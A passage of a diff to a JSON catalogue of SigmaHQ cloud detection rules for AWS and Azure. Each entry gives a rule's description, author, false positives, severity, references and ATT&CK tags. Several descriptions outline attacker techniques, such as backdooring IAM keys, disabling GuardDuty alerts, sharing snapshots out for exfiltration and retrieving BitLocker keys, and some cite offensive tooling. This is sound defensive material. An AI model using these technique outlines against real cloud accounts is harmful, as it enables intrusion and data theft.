+ ], + "filename": "aws_eks_cluster_created_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://any-api.com/amazonaws_com/eks/docs/API_Description", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_eks_cluster_created_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1485" + ] + }, + "uuid": "33d50d03-20ec-4b74-a74e-1e65a38af1c0", + "value": "AWS EKS Cluster Created or Deleted" + }, + { + "description": "Detects when an ElastiCache security group has been created.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "A ElastiCache security group may be created by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security group creations from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "aws_elasticache_security_group_created.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/blob/598f3d7e0a63221c0703ad9a0ea7e22e7bc5961e/rules/integrations/aws/persistence_elasticache_security_group_creation.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_created.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1136", + "attack.t1136.003" + ] + }, + "uuid": "4ae68615-866f-4304-b24b-ba048dfa5ca7", + "value": "AWS ElastiCache Security Group Created" + }, + { + "description": "Identifies when an ElastiCache security group has been modified or deleted.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "A ElastiCache security group deletion may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Security Group deletions from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "aws_elasticache_security_group_modified_or_deleted.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/blob/7d5efd68603f42be5e125b5a6a503b2ef3ac0f4e/rules/integrations/aws/impact_elasticache_security_group_modified_or_deleted.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_elasticache_security_group_modified_or_deleted.yml" + ], + "tags": [ + "attack.impact", + "attack.t1531" + ] + }, + "uuid": "7c797da2-9cf2-4523-ba64-33b06339f0cc", + "value": "AWS ElastiCache Security Group Modified or Deleted" + }, + { + "description": "Detects enumeration of accounts configuration via api call to list different instances and services within a short period of time.", + "meta": { + "author": "toffeebr33k", + "creation_date": "2020/11/21", + "falsepositive": [ + "AWS Config or other configuration scanning activities" + ], + "filename": "aws_enum_listing.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_enum_listing.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1592" + ] + }, + "uuid": "e9c14b23-47e2-4a8b-8a63-d36618e33d70", + "value": "Account Enumeration on AWS" + }, + { + "description": "Detects updates of the GuardDuty list of trusted IPs, perhaps to disable security alerts against malicious IPs.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/11", + "falsepositive": [ + "Valid change in the GuardDuty (e.g. 
to ignore internal scanners)" + ], + "filename": "aws_guardduty_disruption.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/guardduty__whitelist_ip/main.py#L9", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_guardduty_disruption.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "6e61ee20-ce00-4f8d-8aee-bedd8216f7e3", + "value": "AWS GuardDuty Important Change" + }, + { + "description": "Detects AWS API key creation for a user by another user.\nBackdoored users can be used to obtain persistence in the AWS environment.\nAlso with this alert, you can detect a flow of AWS keys in your org.\n", + "meta": { + "author": "faloker", + "creation_date": "2020/02/12", + "falsepositive": [ + "Adding user keys to their own accounts (the filter cannot cover all possible variants of user naming)", + "AWS API keys legitimate exchange workflows" + ], + "filename": "aws_iam_backdoor_users_keys.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/iam__backdoor_users_keys/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_iam_backdoor_users_keys.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "0a5177f4-6ca9-44c2-aacf-d3f3d8b6e4d2", + "value": "AWS IAM Backdoor Users Keys" + }, + { + "description": "Detects when an user creates or invokes a lambda function.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/03", + "falsepositive": [ + "Lambda Function created or invoked may be performed by a system administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_lambda_function_created_or_invoked.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_lambda_function_created_or_invoked.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078" + ] + }, + "uuid": "d914951b-52c8-485f-875e-86abab710c0b", + "value": "AWS Lambda Function Created or Invoked" + }, + { + "description": "Detects evade to Macie detection.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/07/06", + "falsepositive": [ + "System or Network administrator behaviors" + ], + "filename": "aws_macic_evasion.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/macie/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_macic_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ] + }, + "uuid": "91f6a16c-ef71-437a-99ac-0b070e3ad221", + "value": "AWS Macie Evasion" + }, + { + "description": "Detects possible suspicious glue development endpoint activity.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/10/03", + "falsepositive": [ + "Glue Development Endpoint Activity may be performed by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "aws_passed_role_to_glue_development_endpoint.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/", + "https://docs.aws.amazon.com/glue/latest/webapi/API_CreateDevEndpoint.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_passed_role_to_glue_development_endpoint.yml" + ], + "tags": [ + "attack.privilege_escalation" + ] + }, + "uuid": "4990c2e3-f4b8-45e3-bc3c-30b14ff0ed26", + "value": "AWS Glue Development Endpoint Activity" + }, + { + "description": "Detects the change of database master password. It may be a part of data exfiltration.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/12", + "falsepositive": [ + "Benign changes to a db instance" + ], + "filename": "aws_rds_change_master_password.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_change_master_password.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "8a63cdd4-6207-414a-85bc-7e032bd3c1a2", + "value": "AWS RDS Master Password Change" + }, + { + "description": "Detects the recovery of a new public database instance from a snapshot. 
It may be a part of data exfiltration.", + "meta": { + "author": "faloker", + "creation_date": "2020/02/12", + "falsepositive": [ + "Unknown" + ], + "filename": "aws_rds_public_db_restore.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/pacu/blob/866376cd711666c775bbfcde0524c817f2c5b181/pacu/modules/rds__explore_snapshots/main.py", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_rds_public_db_restore.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1020" + ] + }, + "uuid": "c3f265c7-ff03-4056-8ab2-d486227b4599", + "value": "Restore Public AWS RDS Instance" + }, + { + "description": "Detects AWS root account usage", + "meta": { + "author": "vitaliy0x1", + "creation_date": "2020/01/21", + "falsepositive": [ + "AWS Tasks That Require AWS Account Root User Credentials https://docs.aws.amazon.com/general/latest/gr/aws_tasks-that-require-root.html" + ], + "filename": "aws_root_account_usage.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_root_account_usage.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1078.004" + ] + }, + "uuid": "8ad1600d-e9dc-4251-b0ee-a65268f29add", + "value": "AWS Root Credentials" + }, + { + "description": "Detects when a transfer lock was removed from a Route 53 domain. It is recommended to refrain from performing this action unless intending to transfer the domain to a different registrar.", + "meta": { + "author": "Elastic, Austin Songer @austinsonger", + "creation_date": "2021/07/22", + "falsepositive": [ + "A domain transfer lock may be disabled by a system or network administrator. 
Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Activity from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_route_53_domain_transferred_lock_disabled.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transfer_lock_disabled.toml", + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_Operations_Amazon_Route_53.html", + "https://docs.aws.amazon.com/Route53/latest/APIReference/API_domains_DisableDomainTransferLock.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_lock_disabled.yml" + ], + "tags": [ + "attack.persistence", + "attack.credential_access", + "attack.t1098" + ] + }, + "uuid": "3940b5f1-3f46-44aa-b746-ebe615b879e0", + "value": "AWS Route 53 Domain Transfer Lock Disabled" + }, + { + "description": "Detects when a request has been made to transfer a Route 53 domain to another AWS account.", + "meta": { + "author": "Elastic, Austin Songer @austinsonger", + "creation_date": "2021/07/22", + "falsepositive": [ + "A domain may be transferred to another AWS account by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. Domain transfers from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "aws_route_53_domain_transferred_to_another_account.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/blob/c76a39796972ecde44cb1da6df47f1b6562c9770/rules/integrations/aws/persistence_route_53_domain_transferred_to_another_account.toml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_route_53_domain_transferred_to_another_account.yml" + ], + "tags": [ + "attack.persistence", + "attack.credential_access", + "attack.t1098" + ] + }, + "uuid": "b056de1a-6e6e-4e40-a67e-97c9808cf41b", + "value": "AWS Route 53 Domain Transferred to Another Account" + }, + { + "description": "Detects when a user tampers with S3 data management in Amazon Web Services.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "A S3 configuration change may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. S3 configuration change from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "aws_s3_data_management_tampering.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/pull/1145/files", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_Operations.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketLogging.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketWebsite.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_PutBucketEncryption.html", + "https://docs.aws.amazon.com/AmazonS3/latest/userguide/setting-repl-config-perm-overview.html", + "https://docs.aws.amazon.com/AmazonS3/latest/API/API_RestoreObject.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_s3_data_management_tampering.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "78b3756a-7804-4ef7-8555-7b9024a02e2d", + "value": "AWS S3 Data Management Tampering" + }, + { + "description": "Detects the modification of the findings on SecurityHub.", + "meta": { + "author": "Sittikorn S", + "creation_date": "2021/06/28", + "falsepositive": [ + "System or Network administrator behaviors", + "DEV, UAT, SAT environment. You should apply this rule with PROD environment only." 
+ ], + "filename": "aws_securityhub_finding_evasion.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/cli/latest/reference/securityhub/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_securityhub_finding_evasion.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562" + ] + }, + "uuid": "a607e1fe-74bf-4440-a3ec-b059b9103157", + "value": "AWS SecurityHub Findings Evasion" + }, + { + "description": "Detects the modification of an EC2 snapshot's permissions to enable access from another account", + "meta": { + "author": "Darin Smith", + "creation_date": "2021/05/17", + "falsepositive": [ + "Valid change to a snapshot's permissions" + ], + "filename": "aws_snapshot_backup_exfiltration.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://www.justice.gov/file/1080281/download", + "https://attack.mitre.org/techniques/T1537/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_snapshot_backup_exfiltration.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1537" + ] + }, + "uuid": "abae8fec-57bd-4f87-aff6-6e3db989843d", + "value": "AWS Snapshot Backup Exfiltration" + }, + { + "description": "Identifies the suspicious use of AssumeRole. Attackers could move laterally and escalate privileges.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "AssumeRole may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "AssumeRole from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule.", + "Automated processes that uses Terraform may lead to false positives." 
+ ], + "filename": "aws_sts_assumerole_misuse.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/pull/1214", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_assumerole_misuse.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1548", + "attack.t1550", + "attack.t1550.001" + ] + }, + "uuid": "905d389b-b853-46d0-9d3d-dea0d3a3cd49", + "value": "AWS STS AssumeRole Misuse" + }, + { + "description": "Identifies the suspicious use of GetSessionToken. Tokens could be created and used by attackers to move laterally and escalate privileges.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/07/24", + "falsepositive": [ + "GetSessionToken may be done by a system or network administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment. GetSessionToken from unfamiliar users or hosts should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_sts_getsessiontoken_misuse.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/elastic/detection-rules/pull/1213", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_sts_getsessiontoken_misuse.yml" + ], + "tags": [ + "attack.lateral_movement", + "attack.privilege_escalation", + "attack.t1548", + "attack.t1550", + "attack.t1550.001" + ] + }, + "uuid": "b45ab1d2-712f-4f01-a751-df3826969807", + "value": "AWS STS GetSessionToken Misuse" + }, + { + "description": "Identifies when suspicious SAML activity has occurred in AWS. 
An adversary could gain backdoor access via SAML.", + "meta": { + "author": "Austin Songer", + "creation_date": "2021/09/22", + "falsepositive": [ + "Automated processes that uses Terraform may lead to false positives.", + "SAML Provider could be updated by a system administrator. Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "SAML Provider being updated from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." + ], + "filename": "aws_susp_saml_activity.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://docs.aws.amazon.com/IAM/latest/APIReference/API_UpdateSAMLProvider.html", + "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRoleWithSAML.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_susp_saml_activity.yml" + ], + "tags": [ + "attack.initial_access", + "attack.t1078", + "attack.lateral_movement", + "attack.t1548", + "attack.privilege_escalation", + "attack.t1550", + "attack.t1550.001" + ] + }, + "uuid": "f43f5d2f-3f2a-4cc8-b1af-81fde7dbaf0e", + "value": "AWS Suspicious SAML Activity" + }, + { + "description": "An attacker with the iam:UpdateLoginProfile permission on other users can change the password used to login to the AWS console on any user that already has a login profile setup.\nWith this alert, it is used to detect anyone is changing password on behalf of other users.\n", + "meta": { + "author": "toffeebr33k", + "creation_date": "2021/08/09", + "falsepositive": [ + "Legit User Account Administration" + ], + "filename": "aws_update_login_profile.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "aws", + "refs": [ + "https://github.com/RhinoSecurityLabs/AWS-IAM-Privilege-Escalation", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/aws/aws_update_login_profile.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1098" + ] + }, + "uuid": "055fb148-60f8-462d-ad16-26926ce050f1", + "value": "AWS User Login Profile Was Modified" + }, + { + "description": "This detection uses azureactivity logs (Administrative category) to identify the creation or update of a server instance in an Azure AD Hybrid health AD FS service.\nA threat actor can create a new AD Health ADFS service and create a fake server instance to spoof AD FS signing logs. There is no need to compromise an on-prem AD FS server.\nThis can be done programmatically via HTTP requests to Azure.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + "Legitimate AD FS servers added to an AAD Health AD FS service instance" + ], + "filename": "azure_aadhybridhealth_adfs_new_server.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_new_server.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1578" + ] + }, + "uuid": "288a39fc-4914-4831-9ada-270e9dc12cb4", + "value": "Azure Active Directory Hybrid Health AD FS New Server" + }, + { + "description": "This detection uses azureactivity logs (Administrative category) to identify the deletion of an Azure AD Hybrid health AD FS service instance in a tenant.\nA threat actor can create a new AD Health ADFS service and create a fake server to spoof AD FS signing logs.\nThe health AD FS service can then be deleted after it is not longer needed via HTTP requests to Azure.\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research), MSTIC", + "creation_date": "2021/08/26", + "falsepositive": [ + 
"Legitimate AAD Health AD FS service instances being deleted in a tenant" + ], + "filename": "azure_aadhybridhealth_adfs_service_delete.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://o365blog.com/post/hybridhealthagent/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aadhybridhealth_adfs_service_delete.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1578.003" + ] + }, + "uuid": "48739819-8230-4ee3-a8ea-e0289d1fb0ff", + "value": "Azure Active Directory Hybrid Health AD FS Service Delete" + }, + { + "description": "Monitor and alert on conditional access changes where non approved actor removed CA Policy.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/07/19", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "filename": "azure_aad_secops_ca_policy_removedby_bad_actor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_removedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ] + }, + "uuid": "26e7c5e2-6545-481e-b7e6-050143459635", + "value": "CA Policy Removed by Non Approved Actor" + }, + { + "description": "Monitor and alert on conditional access changes. Is Initiated by (actor) approved to make changes? 
Review Modified Properties and compare \"old\" vs \"new\" value.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/07/19", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." + ], + "filename": "azure_aad_secops_ca_policy_updatedby_bad_actor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure#conditional-access", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_ca_policy_updatedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ] + }, + "uuid": "50a3c7aa-ec29-44a4-92c1-fce229eef6fc", + "value": "CA Policy Updated by Non Approved Actor" + }, + { + "description": "Monitor and alert on conditional access changes.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/07/18", + "falsepositive": [ + "Misconfigured role permissions", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment." 
+ ], + "filename": "azure_aad_secops_new_ca_policy_addedby_bad_actor.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-infrastructure", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_new_ca_policy_addedby_bad_actor.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1548" + ] + }, + "uuid": "0922467f-db53-4348-b7bf-dee8d0d348c6", + "value": "New CA Policy by Non-approved Actor" + }, + { + "description": "Define a baseline threshold and then monitor and adjust to suit your organizational behaviors and limit false alerts from being generated.", + "meta": { + "author": "Corissa Koopmans, '@corissalea'", + "creation_date": "2022/04/21", + "falsepositive": [ + "Failed Azure AD Connect Synchronization", + "Service account use with an incorrect password specified", + "Misconfigured systems", + "Vulnerability scanners" + ], + "filename": "azure_aad_secops_signin_failure_bad_password_threshold.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts#things-to-monitor", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_aad_secops_signin_failure_bad_password_threshold.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "dff74231-dbed-42ab-ba49-83289be2ac3a", + "value": "Sign-in Failure Bad Password Threshold" + }, + { + "description": "Identifies user account which has been locked because the user tried to sign in too many times with an incorrect user ID or password.", + "meta": { + "author": "AlertIQ", + "creation_date": "2021/10/10", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_account_lockout.yml", + "level": "medium", + 
"logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-privileged-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_account_lockout.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1110" + ] + }, + "uuid": "2b7d6fc0-71ac-4cf7-8ed1-b5788ee5257a", + "value": "Account Lockout" + }, + { + "description": "Detects when an account was created and deleted in a short period of time.", + "meta": { + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", + "creation_date": "2022/08/11", + "falsepositive": [ + "Legit administrative action" + ], + "filename": "azure_ad_account_created_deleted.yml", + "level": "high", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#short-lived-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_account_created_deleted.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "6f583da0-3a90-4566-a4ed-83c09fe18bbf", + "value": "Account Created And Deleted Within A Close Time Frame" + }, + { + "description": "Detect successful authentications from countries you do not operate out of.", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." 
+ ], + "filename": "azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_authentications_from_countries_you_do_not_operate_out_of.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "8c944ecb-6970-4541-8496-be554b8e2846", + "value": "Successful Authentications From Countries You Do Not Operate Out Of" + }, + { + "description": "Detects when sign-ins increased by 10% or greater.", + "meta": { + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1'", + "creation_date": "2022/08/11", + "falsepositive": [ + "Unlikely" + ], + "filename": "azure_ad_auth_failure_increase.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-failed-unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_failure_increase.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "e1d02b53-c03c-4948-b11d-4d00cca49d03", + "value": "Increased Failed Authentications Of Any Type" + }, + { + "description": "Detects when successful sign-ins increased by 10% or greater.", + "meta": { + "author": "Mark Morowczynski '@markmorow', MikeDuddington, '@dudders1', Tim Shelton", + "creation_date": "2022/08/11", + "falsepositive": [ + "Increase of users in the environment" + ], + "filename": "azure_ad_auth_sucess_increase.yml", + "level": "low", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + 
"https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-user-accounts#monitoring-for-successful-unusual-sign-ins", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_sucess_increase.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "67d5f8fc-8325-44e4-8f5f-7c0ac07cb5ae", + "value": "Measurable Increase Of Successful Authentications" + }, + { + "description": "Detect when authentications to important application(s) only required single-factor authentication", + "meta": { + "author": "MikeDuddington, '@dudders1'", + "creation_date": "2022/07/28", + "falsepositive": [ + "If this was approved by System Administrator." + ], + "filename": "azure_ad_auth_to_important_apps_using_single_factor_auth.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-gb/azure/active-directory/fundamentals/security-operations-user-accounts", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_auth_to_important_apps_using_single_factor_auth.yml" + ], + "tags": [ + "attack.t1078" + ] + }, + "uuid": "f272fb46-25f2-422c-b667-45837994980f", + "value": "Authentications To Important Apps Using Single Factor Authentication" + }, + { + "description": "Monitor and alert for Bitlocker key retrieval.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_bitlocker_key_retrieval.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#bitlocker-key-retrieval", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_bitlocker_key_retrieval.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] 
+ }, + "uuid": "a0413867-daf3-43dd-9245-734b3a787942", + "value": "Bitlocker Key Retrieval" + }, + { + "description": "Monitor and alert for device registration or join events where MFA was not performed.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + "Unknown" + ], + "filename": "azure_ad_device_registration_or_join_without_mfa.yml", + "level": "medium", + "logsource.category": "No established category", + "logsource.product": "azure", + "refs": [ + "https://docs.microsoft.com/en-us/azure/active-directory/fundamentals/security-operations-devices#device-registrations-and-joins-outside-policy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/cloud/azure/azure_ad_device_registration_or_join_without_mfa.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1078" + ] + }, + "uuid": "5afa454e-030c-4ab4-9253-a90aa7fcc581", + "value": "Device Registration or Join Without MFA" + }, + { + "description": "Monitor and alert for changes to the device registration policy.", + "meta": { + "author": "Michael Epping, '@mepples21'", + "creation_date": "2022/06/28", + "falsepositive": [ + 